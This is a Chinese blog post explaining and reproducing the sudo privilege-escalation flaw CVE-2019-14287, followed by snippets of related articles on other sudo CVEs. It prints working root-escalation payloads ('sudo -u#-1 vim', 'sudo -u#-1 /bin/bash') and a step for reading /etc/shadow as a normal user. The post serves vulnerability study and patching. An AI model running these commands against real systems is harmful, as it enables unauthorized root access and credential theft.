sudo提权漏洞(CVE-2019-14287)

最新推荐文章于 2025-07-03 22:38:02 发布
原创 最新推荐文章于 2025-07-03 22:38:02 发布 · 773 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sudo #提权 #CVE #sudo提权 #sudo漏洞

本文介绍了Linux系统管理工具sudo的一个严重提权漏洞CVE-2019-14287。该漏洞允许普通用户通过特定条件获取root权限,主要影响sudo版本小于1.8.28。文章详细阐述了漏洞的原因,复现过程以及修复措施,提醒用户及时更新sudo到最新版本以防止潜在风险。

sudo提权漏洞CVE-2019-14287)

  • 希望你别像风在我这里掀起了万般波澜却又跟云去了远方

漏洞概述:

  • sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,漏洞主要原因因为将用户 ID 转换为用户名的函数,会将 -1(或无效等效的 4294967295)误认为 0,而这正好是 root 用户的 ID 。

漏洞版本:

  • SUDO<1.8.28(sudo -V )

漏洞复现:

要求/etc/sudoers,有该账户设置允许的权限。

利用普通用户读取/etc/shadow
在这里插入图片描述
漏洞payload

sudo -u#-1 vim 
or
sudo -u#4294967295 vim

然后在vim执行命令,即可成功绕过权限限制
在这里插入图片描述在这里插入图片描述

漏洞修复:

  • 升级升级升级。

    余生很长,请多指教。
    在这里插入图片描述

最低0.47元/天 解锁文章
sudo相关漏洞CVE-2019-18634、CVE-2019-14287
悦分享
08-07 944
实际上,只要用户的限足够高,即拥有最高sudo限的用户,并且在Runas规范中定义了ALL关键字的话,他们就可以运行Runas规范中明确禁止使用的那些root命令,而且以这种方式运行的命令其日志项所显示的目标用户为4294967295,而不是root。但是,sudo日志条目中记录下的命令运行用户的ID为“4294967295”,而并非root用户(或用户ID为“0”),除此之外,因为用户ID是通过-u选项指定的,并且不会在密码数据库中存储,所以PAM会话模块也不会运行。上述命令运行之后,将返回“0”。.
Linux sudo 漏洞 CVE-2021-3156 复现 附exp
god_Zeo的安全博客
02-04 2058
0x01 CVE-2021-3156: 缓冲区溢出漏洞sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudoer和非sudoers)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得root限。 0x02 影响版本 Sudo 1.8.2 - 1.8.31p2 Sudo 1.9.0 - 1.9.5p1 不受影响版本 Sudo =>1.9.5p2 0x03 漏洞检测 测试环境:ubuntu:20.04 检测是否存在 s
漏洞复现 之 sudo漏洞CVE-2019-14287)复现
Abc_Kimball的博客
01-31 993
一、简介 sudo:Linux系统命令,让普通账号以root身份去执行某些命令,如,安装软件、查看某些配置文件、关机、重启等操作,如果普通账号需要使用sudo需要修改配置文件/etc/sudoers,将sudo使用限赋予该账号 • sudo漏洞是一个安全策略绕过问题,去执行某些敏感的命令,CVE编号是CVE-2019-14287,影响的版本是:<1.8.28 二、漏洞复现过程 靶机:Ubuntu 18 x64系统 1.查看sudo版本,并创建test用户 1 sudo -V 查看sudo版本
CVE-2019-14287(sudo)
墨痕诉清风的博客
06-22 808
复现CVE-2019-14287漏洞 原理:Sudo的全称是"superuserdo”,它是Linux系统管理指令,允许用户在不需要切换环境的前下,以其它用户的限运行应用程序或命令,通常是以root用户身份运行命令,以减少root用户的登录和管理时间,同时高安全性,当在Linux操作系统上执行命令时,只有得到许可或者知道root密码,普通用户才可以使用sudo命令以root身份执行命令. 个人理解:(直白点讲就是,如果你入侵了他人的主机,可以利用该漏洞,进行限升级,不用切换root,因为切换root
Linux sudo 本地漏洞(CVE-2025-32462、CVE-2025-32463) 复现+验证poc
最新发布
qq_45770644的博客
07-03 1643
漏洞源于sudo-h(--host)选项存在缺陷,该选项本应与-l(--list)配合使用来查询远程主机限,但实际未严格限制其仅用于查询功能。Sudo是Linux系统中常见的高限命令行工具,它允许授用户根据系统安全策略,以超级用户(root)或其他用户身份执行命令,广泛用于实施最小限原则,让用户无需共享root密码即可完成需要限的管理任务,并在系统日志中生成审计记录。请注意,在进行任何系统更新或配置更改之前,建议备份重要数据,并在测试环境中进行充分的测试。首先,攻击者需为本地低限用户;
sudo-cve-2019-18634:CVE-2019-18634的概念证明
03-21
这个概念证明是关于CVE-2019-18634漏洞的,这是一次重要的安全事件,影响了广泛使用的sudo软件。 **CVE-2019-18634 描述** CVE-2019-18634 是一个严重的安全漏洞,被发现存在于sudo 1.8.2 至 1.8.23p2 版本之间。...
java漏洞_sudo 漏洞CVE-2019-14287)复现
weixin_33512961的博客
02-13 285
(该文参考网络他人资料,仅为学习,不许用于非法用途)一、环境1、sudo版本小于1.8.28的Linux系统2、sudo 是Linux系统命令,让普通账号以root身份去执行某些命令,比如:安装软件、查看某些配置文件、关机、重启等操作、如果普通用户需要使用sudo,需要将修改配置文件/etc/sudoers,将sudo使用赋予该账号sudo 漏洞是一个安全策略绕过问题,去执行某些敏感的命令,...
CVE-2019-14287 sudo漏洞分析
独行者103的专栏
10-18 609
一、本文目的 解释sudo漏洞 简要说明基础概念在安全领域的重要性 二、漏洞特点。 本漏洞sudo在处理user id为-1和4294967295(232−12^{32}-1232−1)即可,为什么呢? 下面做出解释。 三、漏洞分析 根据Linux Interface Programming的解释,首先我们要知道uid的类型: struct passwd { char *pw_name; ...
Sudo 堆缓冲区溢出致本地漏洞(CVE-2021-3156)
qq_42947816的博客
05-29 3612
2021年1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。
sudo堆缓冲区溢出漏洞CVE-2021-3156)
Ryan的博客
01-13 3148
sudo堆缓冲区溢出漏洞CVE-2021-3156)
漏洞复现】 Sudo缓存溢出漏洞CVE-2021-3156)
weixin_44647915的博客
04-22 6712
说明:此博客为本人的漏洞复现学习过程记录 前言 漏洞原理:本次的漏洞存在于Sudo--一个基于堆的缓冲区溢出漏洞CVE-2021-3156,该漏洞被命名为“Baron Samedit”),在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论是否在sudoers文件中)获得root限,无需进行身份验证,且攻击.
sudo漏洞详解与汇总
有勇气的牛排博客
07-22 813
目录1 介绍2 常见方法2.1 git 2.2 su2.3 zip2.4 tar2.5 strace2.6 nmap2.7 more2.8 ftp2.9 vim2.10 find2.11 passwd2.12 awk3 防止有sudo限的普通用户修改root的密码 1 介绍 sudo是常用的Linux命令,允许普通用户执行root命令 原理: 普通用户在使用sudo执行命令的过程中,会暂时拥有root限,如过该命令执行没有中断,而且该命令运行的过程中可以调用系统命令,那就可以直接运行/bin/b
Linux sudo 被曝漏洞,任意用户均能以 root 身份运行命令
寒冰屋的专栏
10-15 535
Linux 用户请注意!根据外媒的报道,Linux sudo 被曝出存在一个漏洞,可完全绕过sudo 的安全策略。 先简单说明一下情况,报道指出 sudo 存在一个安全策略隐患,即便"sudoers configuration"配置文件中明确表明不允许以 root用户进行访问,但通过该漏洞,恶意用户或程序仍可在目标 Linux 系统上以 root 用户身份执行任意命令。 sud...
sudo本地漏洞复现(CVE-2021-3156)
我们为什么能在这里遇到?
02-03 1121
描述 Sudo是Linux/Unix系统上常用的工具,管理员可通过它分配给普通用户所需的管理限,几乎所有的Linux及Unix系统都安装有程序。此基于堆的缓冲区溢出漏洞已隐藏十年之久,利用此漏洞,非特的本地普通用户可以在主机上获得root特。相关研究人员已经在Ubuntu 20.04(Sudo 1.8.31)、Debian 10(Sudo 1.8.27)、Fedora 33(Sudo 1.9.2)等系统上验证漏洞存在,并利用漏洞获得了完整的root用户特。 影响版本 Sudo1.8.2到 1.8.3
CVE-2019-14287sudo
1stPeak's Blog
07-13 326
介绍 如果sudo配置允许用户通过Runas规范中定义的ALL关键字来以任意用户身份运行命令,那么攻击者有可能通过制定用户ID以root限执行恶意命令 影响版本 sudo版本<1.8.28 查看sudo版本命令 sudo -V 复现 前:需要知道普通账号密码 以root身份执行命令: sudo -u#-1 id 或 sudo -u#4294967259 whoami 以root身份登录: sudo -u#-1 /bin/bash 或 sudo -u#4294967259 /bin/bash
漏洞复现】CVE-2023-22809 sudo漏洞
hack0919的博客
05-20 1793
漏洞等级:高危
升】Linux Sudo漏洞(CVE-2023-22809)
李同學的安全圈
04-05 9517
sudo 允许系统管理员将限委托给某些用户(或用户组),能够以ROOT用户或其他用户身份运行部分(或全部)命令。由于Sudo中的sudoedit对处理用户供的环境变量(如SUDO_EDITOR、VISUAL和EDITOR)中传递的额外参数存在缺陷。当用户指定的编辑器包含绕过sudoers策略的 " –" 参数时,拥有sudoedit访问限的本地攻击者可通过将任意条目附加到要处理的文件列表中,最终在目标系统上实现升。
sudo漏洞cve-2023-22809
m0_46317063的博客
06-06 1333
cve-2023-22809
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值